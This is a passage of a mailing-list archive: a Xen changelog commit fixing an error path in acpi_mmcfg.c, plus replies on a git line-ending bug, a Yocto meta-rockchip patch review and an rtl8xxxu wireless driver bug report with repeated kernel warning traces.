 kSElFQDo/raYycXJXNp3tq/tNnOPWTOz9vpi/d/zm2VNTfW41brtvGRXTe/Py/gU9fHstNv1f
 4vLFuUdlxHYp7xIevl7m8f/Vpz+JnqqaoMO3al2q87rFdsXrO/54lV7fbSFaW111Ps08r1ViT
 fXfr3vKLNxlyB2L9P99jNt1D9UnKLNaj+1S+DFU/9DZRYijMSDbWYi4oTAS90KjlDAgAA
X-Env-Sender: ian.jackson@eu.citrix.com
X-Msg-Ref: server-5.tower-31.messagelabs.com!1496730254!100991130!1
X-Originating-IP: [104.130.215.37]
X-SpamReason: No, hits=3D0.0 required=3D7.0 tests=3D
X-StarScan-Received:=20
X-StarScan-Version: 9.4.19; banners=3D-,-,-
X-VirusChecked: Checked
Message-Id: <E1dI7uY-0004SL-1A@xenbits.xenproject.org>
Date: Tue, 06 Jun 2017 06:24:14 +0000
Subject: [Xen-changelog] [xen master] x86/mmcfg: set pci_mmcfg_config_num t=
o
	0 on error path
X-BeenThere: xen-changelog@lists.xen.org
X-Mailman-Version: 2.1.18
Precedence: list
List-Id: "Change log for Mercurial \(receive only\)"
 <xen-changelog.lists.xen.org>
List-Unsubscribe: <https://lists.xen.org/cgi-bin/mailman/options/xen-change=
log>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dunsubscribe>
List-Unsubscribe: <mailto:unsubscribe-1188110264-f4da1594@opayq.com>, <http=
s://emails.abine.com/disableDisposable?fwd=3DFWD-737QHYSMHVAYQAUCAOIQBDAAGA=
QLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAACA=3D=3D=
=3D@opayq.com>
List-Post: <mailto:xen-changelog@lists.xen.org>
List-Help: <mailto:xen-changelog-request@lists.xen.org?subject=3Dhelp>
List-Subscribe: <https://lists.xen.org/cgi-bin/mailman/listinfo/xen-changel=
og>,=20
 <mailto:xen-changelog-request@lists.xen.org?subject=3Dsubscribe>
X-Sender-Domain: xenproject.org
X-Spamfilter-host: plato.junkemailfilter.com - http://www.junkemailfilter.c=
om
X-Key-ID: ZjRkYTE1OTRAb3BheXEuY29tIHhlbi1jaGFuZ2Vsb2ctYm91bmNlc0BsaXN0cy54Z=
W4ub3JnIDIwMTctMDYtMDUgMjM6MjQ6MTggMWRJN3VjLTAwMDc5Sy0xSA=3D=3D
X-Mail-from: xen-changelog-bounces@lists.xen.org
X-Sender-Host-Address: 192.237.175.120
X-Sender-Host-Name: lists.xenproject.org
X-Key-ID: Y3VydGlza3dvbmc5QGdtYWlsLmNvbSBmd2QtNzM3cWh5c21odmF5cWF1Y2FvaXFiZ=
GFhZ2FxbG1hMnlhbWhlY2NqZGxpYmF5YXd5YWtpYXphcWhzbWNjd21ibGlhNHVhbnF1ZWlnY2lt=
YmttYXp1ejRhYWVhYWNhPT09QG9wYXlxLmNvbSAyMDE3LTA2LTA1IDIzOjI0OjIwIDFkSTd1ZS0=
wMDAxeTktTWI=3D

--=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D1214394456227948508=3D=3D
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable


-------------------------Blur-------------------------
This email is forwarded from a MASKED EMAIL you created using Blur.  (https=
=3D
://dnt.abine.com/#help/faq/faq-whataremaskedemails).
IF THIS IS SPAM, CLICK HERE TO BLOCK:
https://dnt.abine.com/#/block_email/f4da1594@opayq.com/FWD-737QHYSMHVAYQAUC=
=3D
AOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAA=
=3D
CA=3D3D=3D3D=3D3D@opayq.com

Want to shop safely and privately online? Go Premium: https://dnt.abine.com=
=3D
/?pk_campaign=3D3DmaskHeader#premium
-------------------------by Abine-------------------------


commit d7594d553b10e74a0cbe15a157baac1aae1d3acd
Author:     Roger Pau Monn=3DC3=3DA9 <roger.pau@citrix.com>
AuthorDate: Wed May 31 08:39:47 2017 +0200
Commit:     Jan Beulich <jbeulich@suse.com>
CommitDate: Wed May 31 08:39:47 2017 +0200

    x86/mmcfg: set pci_mmcfg_config_num to 0 on error path
   =3D20
    One error path of acpi_parse_mcfg doesn't set pci_mmcfg_config_num to z=
=3D
ero, fix
    this.
   =3D20
    Signed-off-by: Roger Pau Monn=3DC3=3DA9 <roger.pau@citrix.com>
    Reviewed-by: Jan Beulich <jbeulich@suse.com>
---
 xen/arch/x86/x86_64/acpi_mmcfg.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/xen/arch/x86/x86_64/acpi_mmcfg.c b/xen/arch/x86/x86_64/acpi_mm=
=3D
cfg.c
index a96d5e0..650140e 100644
--- a/xen/arch/x86/x86_64/acpi_mmcfg.c
+++ b/xen/arch/x86/x86_64/acpi_mmcfg.c
@@ -96,6 +96,7 @@ int __init acpi_parse_mcfg(struct acpi_table_header *head=
=3D
er)
     if (!pci_mmcfg_config) {
         printk(KERN_WARNING PREFIX
                "No memory for MCFG config tables\n");
+        pci_mmcfg_config_num =3D3D 0;
         return -ENOMEM;
     }
=3D20
--
generated by git-patchbot for /home/xen/git/xen.git#master


--=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D1214394456227948508=3D=3D
Content-Type: text/plain; charset=3D"utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


-------------------------Blur-------------------------
This email is forwarded from a MASKED EMAIL you created using Blur.  (https=
://dnt.abine.com/#help/faq/faq-whataremaskedemails).
IF THIS IS SPAM, CLICK HERE TO BLOCK:
https://dnt.abine.com/#/block_email/f4da1594@opayq.com/FWD-737QHYSMHVAYQAUC=
AOIQBDAAGAQLMA2YAMHECCJDLIBAYAWYAKIAZAQHSMCCWMBLIA4UANQUEIGCIMBKMAZUZ4AAEAA=
CA=3D=3D=3D@opayq.com

Want to shop safely and privately online? Go Premium: https://dnt.abine.com=
/?pk_campaign=3DmaskHeader#premium
-------------------------by Abine-------------------------


_______________________________________________
Xen-changelog mailing list
Xen-changelog@lists.xen.org
https://lists.xenproject.org/xen-changelog
--=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D1214394456227948508=3D=3D--

[-- Attachment #2: Type: text/plain, Size: 127 bytes --]

_______________________________________________
Xen-devel mailing list
Xen-devel@lists.xen.org
https://lists.xen.org/xen-devel

^ permalink raw reply related	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]     ` <591f6844.82dcca0a.451e5.8f76.GMRIR@mx.google.com>
@ 2017-05-19 21:51       ` Atousa Duprat
  0 siblings, 0 replies; 183+ messages in thread
From: Atousa Duprat @ 2017-05-19 21:51 UTC (permalink / raw)
  To: git, Animi Vulpis

Hi,

I have tried to repro this issue but git goes out of its way to store
the commit messages using unix end-of-line format.
I think that git itself cannot create a repo exhibiting this problem.

Most helpful would be if you could create a mini repo using gitlab.
All it would need is one file, two branches, and a merge.
With that in hand, it should be pretty easy to track down the problem
and fix git.

You mentioned that the previous version you were using was working
fine, can you tell me which version that was?
It'll help to narrow down the changes that could have affected the issue.

Thanks,

Atousa

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]       ` <588ba270.4c18370a.3b01f.9247.GMRIR@mx.google.com>
@ 2017-01-27 19:46         ` Trevor Woerner
  0 siblings, 0 replies; 183+ messages in thread
From: Trevor Woerner @ 2017-01-27 19:46 UTC (permalink / raw)
  To: Romain Perier, Jacob Chen, yocto, Eddie Cai


[-- Attachment #1.1: Type: text/plain, Size: 3410 bytes --]

Jacob,

gmail bounced this message back from the "jacob-chen@rock-chips.com" email
address since the mail handler for rock-chips.com said the "jacob-chen"
user does not exist. We can't accept a Signed-off-by line that doesn't
point to a valid email address. Please adjust your Signed-off-by line to
point to a real email address.

Best regards,
    Trevor

On Fri, Jan 27, 2017 at 2:41 PM, Mail Delivery Subsystem <
mailer-daemon@googlemail.com> wrote:

> [image: Error Icon]
> Message not delivered
> There was a problem delivering your message to *jacob-chen@rock-chips.com*.
> See the technical details below, or try resending in a few minutes.
> The response from the remote server was:
>
> 550 jacob-chen@rock-chips.com:user not exist
>
> Final-Recipient: rfc822; jacob-chen@rock-chips.com
> Action: failed
> Status: 5.0.0
> Remote-MTA: dns; mxwcom.263xmail.com. (38.83.106.84, the server for the
> domain rock-chips.com.)
> Diagnostic-Code: smtp; 550 jacob-chen@rock-chips.com:user not exist
> Last-Attempt-Date: Fri, 27 Jan 2017 11:41:36 -0800 (PST)
>
>
> ---------- Forwarded message ----------
> From: Trevor Woerner <twoerner@gmail.com>
> To: Romain Perier <romain.perier@gmail.com>
> Cc: Jacob Chen <jacob-chen@iotwrt.com>, "yocto@yoctoproject.org" <
> yocto@yoctoproject.org>, Eddie Cai <eddie.cai@rock-chips.com>, Jacob Chen
> <jacob-chen@rock-chips.com>
> Date: Fri, 27 Jan 2017 14:41:32 -0500
> Subject: Re: [meta-rockchip][PATCH 2/7] machine: Add machine file for the
> rk3288 linux Boards
> On Fri, Jan 27, 2017 at 9:37 AM, Romain Perier <romain.perier@gmail.com>
> wrote:
> > Could you:
> > - Make one patch per new machine file and not one patch for all new added
> > machine
>
> Agreed.
>
> Are all of these machines actual devices? The evb one doesn't sound real.
>
> Are all of these machines released and available for purchase? I've
> heard of the tinkerboard (although I can't seem to find one I can
> actually buy) but I haven't heard of the fennec.
>
> > - Add a clear @DESCRIPTION for each board, see an example here:
> > https://git.yoctoproject.org/cgit/cgit.cgi/meta-rockchip/
> tree/conf/machine/firefly-rk3288.conf
> > - Write a clear and an understandable commit message for your new patches
> >
> > @Trevor: What do you think about this rk-linux.inc ? I don't like this,
> > either its name and what it contains.
>
> First off, I think it's really great to see people contributing to
> meta-rockchip! :-)
>
> This entire set of patches seems to be adding "official" support for
> the rockchip devices; in other words, these recipes will help you to
> create builds that use the official rockchip sources. That is great.
> But I think a good BSP gives a user all the possibilities but then
> leaves the final decision up to them.
>
> So I agree with Romain, I think the name could use more work. It would
> be nice if this set of patches included something in the name that let
> the user know these build from official sources. Then the user could
> decide whether they want to use the official rockchip sources, or
> whether they want to build from upstream. So I'm not opposed to the
> idea of adding recipes for official sources, I'd like like to see them
> added in a way that leaves the decision with the user.
>
>
>
> > That's it for now.
> > Thanks for your patches
>
> +1 :-)
>
>

[-- Attachment #1.2: Type: text/html, Size: 5830 bytes --]

[-- Attachment #2: icon.png --]
[-- Type: image/png, Size: 2935 bytes --]

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <089e010d935cc850e4052a580ec2@google.com>
@ 2016-01-27 22:25   ` André Vitor
  0 siblings, 0 replies; 183+ messages in thread
From: André Vitor @ 2016-01-27 22:25 UTC (permalink / raw)
  To: linux-wireless; +Cc: Jes Sorensen

Hi all,

I'm having trouble with driver r8xxxu. My device has a realtek usb
wifi+bt combo (0bda:0724) built-in.
I can connect to a wifi network but if I open something that uses
connections the driver stops working with a mac80211 crash message.

OS used is Android-x86 with kernel 4.4.0.

I'm also CC'ing the driver's author as I contacted him earlier.

dmesg >
[   34.641610] ------------[ cut here ]------------
[   34.641701] WARNING: CPU: 0 PID: 0 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   34.641709] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   34.641852] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.4.0-android-x86+ #2
[   34.641859] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   34.641867]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
da4467c0 f637c7f8
[   34.641887]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
f553b501 00000000
[   34.641906]  dee010b4 00000000 f82f815c f3f1e800 dee010b8 d48231d8
f637c420 ffffffff
[   34.641925] Call Trace:
[   34.641944]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   34.641958]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   34.642030]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   34.642042]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   34.642114]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   34.642178]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   34.642190]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   34.642201]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   34.642213]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   34.642225]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   34.642231]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   34.642278]  [<c1004121>] ? do_IRQ+0x88/0x99
[   34.642292]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   34.642306]  [<c13b0678>] ? cpuidle_enter_state+0x16a/0x2a7
[   34.642319]  [<c1067bb4>] ? cpu_startup_entry+0x197/0x280
[   34.642332]  [<c1833a41>] ? start_kernel+0x35b/0x35e
[   34.642340] ---[ end trace 2226f818bc03f025 ]---
[   34.844354] ------------[ cut here ]------------
[   34.844407] WARNING: CPU: 0 PID: 7 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   34.844412] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   34.844494] CPU: 0 PID: 7 Comm: rcu_preempt Tainted: G        W
  4.4.0-android-x86+ #2
[   34.844498] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   34.844502]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d4ae3880 f637c7f8
[   34.844514]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
f553b501 00000000
[   34.844524]  da4bdeb4 00000000 f82f815c f3f1e800 da4bdeb8 d4ae54d8
f3f45340 00200282
[   34.844535] Call Trace:
[   34.844548]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   34.844556]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   34.844595]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   34.844602]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   34.844641]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   34.844676]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   34.844682]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   34.844688]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   34.844695]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   34.844702]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   34.844705]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   34.844714]  [<c1004121>] ? do_IRQ+0x88/0x99
[   34.844722]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   34.844730]  [<c107e176>] ? run_timer_softirq+0x1ec/0x1ec
[   34.844737]  [<c14ef723>] ? schedule_timeout+0x58/0x192
[   34.844742]  [<c107de7f>] ? detach_if_pending+0xad/0xad
[   34.844750]  [<c1067760>] ? prepare_to_wait_event+0x9d/0xa5
[   34.844757]  [<c107a286>] ? rcu_gp_kthread+0x415/0x6d6
[   34.844763]  [<c1067824>] ? wait_woken+0x59/0x59
[   34.844769]  [<c1079e71>] ? rcu_cpu_notify+0x325/0x325
[   34.844776]  [<c104f318>] ? kthread+0xae/0xb3
[   34.844783]  [<c14f0289>] ? ret_from_kernel_thread+0x21/0x38
[   34.844789]  [<c104f26a>] ? kthread_create_on_node+0x100/0x100
[   34.844794] ---[ end trace 2226f818bc03f026 ]---
[   35.620254] ------------[ cut here ]------------
[   35.620315] WARNING: CPU: 0 PID: 0 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   35.620321] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   35.620406] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G        W
4.4.0-android-x86+ #2
[   35.620412] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   35.620416]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d4979340 f637c7f8
[   35.620445]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
f553b501 00000000
[   35.620455]  dee010b4 00000000 f82f815c f3f1e800 dee010b8 d494b898
f637c420 ffffffff
[   35.620466] Call Trace:
[   35.620477]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   35.620486]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   35.620525]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   35.620532]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   35.620571]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   35.620606]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   35.620613]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   35.620619]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   35.620626]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   35.620641]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   35.620656]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   35.620680]  [<c1004121>] ? do_IRQ+0x88/0x99
[   35.620688]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   35.620696]  [<c13b0678>] ? cpuidle_enter_state+0x16a/0x2a7
[   35.620704]  [<c1067bb4>] ? cpu_startup_entry+0x197/0x280
[   35.620711]  [<c1833a41>] ? start_kernel+0x35b/0x35e
[   35.620716] ---[ end trace 2226f818bc03f027 ]---
[   35.621359] ------------[ cut here ]------------
[   35.621413] WARNING: CPU: 0 PID: 0 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   35.621418] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   35.621490] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G        W
4.4.0-android-x86+ #2
[   35.621496] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   35.621499]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d4ae3280 f637c7f8
[   35.621527]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
c17b5650 00200282
[   35.621537]  00000000 00000000 c10674fa 00000000 00000000 00000001
00000003 f676ca40
[   35.621547] Call Trace:
[   35.621554]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   35.621561]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   35.621600]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   35.621606]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   35.621645]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   35.621651]  [<c10674fa>] ? __wake_up+0x2c/0x3b
[   35.621685]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   35.621700]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   35.621717]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   35.621731]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   35.621743]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   35.621746]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   35.621755]  [<c1004121>] ? do_IRQ+0x88/0x99
[   35.621762]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   35.621768]  [<c13b0678>] ? cpuidle_enter_state+0x16a/0x2a7
[   35.621775]  [<c1067bb4>] ? cpu_startup_entry+0x197/0x280
[   35.621781]  [<c1833a41>] ? start_kernel+0x35b/0x35e
[   35.621785] ---[ end trace 2226f818bc03f028 ]---
[   69.347231] binder: 2988:2996 refcount change on invalid ref 10
[   69.386497] ------------[ cut here ]------------
[   69.386552] WARNING: CPU: 0 PID: 1147 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   69.386556] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   69.386640] CPU: 0 PID: 1147 Comm: loop1 Tainted: G        W
4.4.0-android-x86+ #2
[   69.386643] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   69.386648]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d077f880 f637c7f8
[   69.386659]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
c17b5bd0 00000282
[   69.386669]  00000000 00000000 c10674fa 00000000 00000000 00000001
00000003 f676cc80
[   69.386680] Call Trace:
[   69.386692]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   69.386700]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   69.386740]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   69.386747]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   69.386786]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   69.386793]  [<c10674fa>] ? __wake_up+0x2c/0x3b
[   69.386827]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   69.386834]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   69.386840]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
[   69.386847]  [<c103e9b0>] ? __tasklet_hrtimer_trampoline+0x27/0x27
[   69.386854]  [<c100467f>] ? do_softirq_own_stack+0x1a/0x1f
[   69.386857]  <IRQ>  [<c103ecf8>] ? irq_exit+0x31/0x70
[   69.386867]  [<c1004121>] ? do_IRQ+0x88/0x99
[   69.386874]  [<c14f0a69>] ? common_interrupt+0x29/0x30
[   69.386883]  [<c110a63a>] ? atime_needs_update+0x6/0x99
[   69.386889]  [<c110a6e2>] ? touch_atime+0x15/0x7c
[   69.386896]  [<c10c77e1>] ? generic_file_read_iter+0x485/0x56e
[   69.386904]  [<c10f7914>] ? vfs_iter_read+0x59/0x84
[   69.386913]  [<c12cd92a>] ? loop_queue_work+0x52a/0x783
[   69.386920]  [<c1053e07>] ? finish_task_switch+0x11f/0x174
[   69.386928]  [<c104f3b2>] ? kthread_worker_fn+0x95/0x108
[   69.386933]  [<c104f31d>] ? kthread+0xb3/0xb3
[   69.386939]  [<c104f318>] ? kthread+0xae/0xb3
[   69.386946]  [<c14f0289>] ? ret_from_kernel_thread+0x21/0x38
[   69.386952]  [<c104f26a>] ? kthread_create_on_node+0x100/0x100
[   69.386957] ---[ end trace 2226f818bc03f029 ]---
[   69.387624] ------------[ cut here ]------------
[   69.387673] WARNING: CPU: 0 PID: 1147 at
/home/andre64/m-x86/kernel/net/mac80211/rx.c:3619
ieee80211_rx_napi+0x63/0x60f [mac80211]()
[   69.387677] Modules linked in: hid_sensor_accel_3d hid_sensor_als
hid_sensor_magn_3d hid_sensor_incl_3d hid_sensor_rotation
hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer
kfifo_buf industrialio hid_sensor_iio_common hid_sensor_custom mac_hid
rtl8xxxu mac80211 cfg80211 atkbd pcspkr efivars snd_hda_codec_hdmi
snd_hda_codec_realtek snd_hda_codec_generic i2c_i801 lpc_ich
snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep i915 drm_kms_helper
drm fb_sys_fops sysfillrect syscopyarea sysimgblt i2c_algo_bit
hid_sensor_hub hid_multitouch dw_dmac dw_dmac_core i2c_hid
i2c_designware_platform i2c_designware_core snd_soc_sst_acpi 8250_dw
pwm_lpss_platform pwm_lpss snd_soc_rt5640 snd_soc_rl6231 snd_soc_core
snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd soundcore
ac97_bus
[   69.387758] CPU: 0 PID: 1147 Comm: loop1 Tainted: G        W
4.4.0-android-x86+ #2
[   69.387761] Hardware name: Zmax B10T/B10T, BIOS 5.6.5 11/22/2013
[   69.387765]  00000000 c14e8b20 00000000 c103bae0 f91a9291 00000e23
d4aeba00 f637c7f8
[   69.387776]  f637c7e8 f637c420 c103bb58 00000009 00000000 f91a9291
c107e320 f580ea04
[   69.387786]  00000282 00000000 f676cc80 c17b5a40 c17b5a40 f676cc80
c1079533 c17b5a40
[   69.387797] Call Trace:
[   69.387807]  [<c14e8b20>] ? dump_stack+0x45/0x65
[   69.387815]  [<c103bae0>] ? warn_slowpath_common+0x8a/0x9f
[   69.387854]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   69.387861]  [<c103bb58>] ? warn_slowpath_null+0xd/0x10
[   69.387900]  [<f91a9291>] ? ieee80211_rx_napi+0x63/0x60f [mac80211]
[   69.387907]  [<c107e320>] ? internal_add_timer+0x24/0x5b
[   69.387914]  [<c1079533>] ? __note_gp_changes+0x26/0x80
[   69.387948]  [<f918d1d1>] ? ieee80211_tasklet_handler+0x4f/0x8e [mac80211]
[   69.387954]  [<c103f04c>] ? tasklet_action+0x78/0x81
[   69.387960]  [<c103ea69>] ? __do_softirq+0xb9/0x21c
